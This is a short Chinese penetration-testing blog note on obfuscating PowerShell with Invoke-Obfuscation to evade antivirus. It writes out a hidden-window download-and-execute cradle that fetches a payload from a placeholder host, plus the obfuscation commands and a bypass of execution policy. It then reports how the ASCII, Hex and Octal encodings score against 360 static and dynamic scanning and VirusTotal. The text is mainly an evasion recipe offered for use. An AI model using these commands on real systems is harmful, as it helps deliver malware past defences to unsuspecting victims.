【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】

0x01 项目地址

https://github.com/danielbohannon/Invoke-Obfuscation

0x02 用法

  1. 生成powershell:
    在这里插入图片描述
    在这里插入图片描述
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"
  1. 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation
    如果报错请先执行:Set-ExecutionPolicy Unrestricted
    在这里插入图片描述
  2. 输入要混淆的PS:set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'
    (设置ps文件:set scriptpath C:\0_poweshell\msf-crow.ps1
    在这里插入图片描述
  3. 输入ENCODING选择要编码的方式:
    在这里插入图片描述

0x03 编码测试

1. ASCII

  1. 选择1:
    在这里插入图片描述

  2. 输出:out PowerShellCodeASCII.ps1
    在这里插入图片描述

  3. 免杀与上线测试

  • 360静态查杀:
    在这里插入图片描述
  • 360动态查杀:
    在这里插入图片描述
    在这里插入图片描述
  • VT:5/58
    在这里插入图片描述

2. Hex

  1. undo 撤销上次命令:
    在这里插入图片描述

  2. 编码并输出:
    在这里插入图片描述

  3. 免杀与上线测试

  • 360静态查杀:
    在这里插入图片描述

  • 360动态查杀:
    在这里插入图片描述
    在这里插入图片描述

  • VT:9/59
    在这里插入图片描述

3. Octal

  1. 编码并输出:
    在这里插入图片描述

  2. 免杀与上线测试

  • 360静态查杀:
    在这里插入图片描述

  • 360动态查杀:
    在这里插入图片描述
    在这里插入图片描述

  • VT:7/58在这里插入图片描述

不再赘述。。。

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值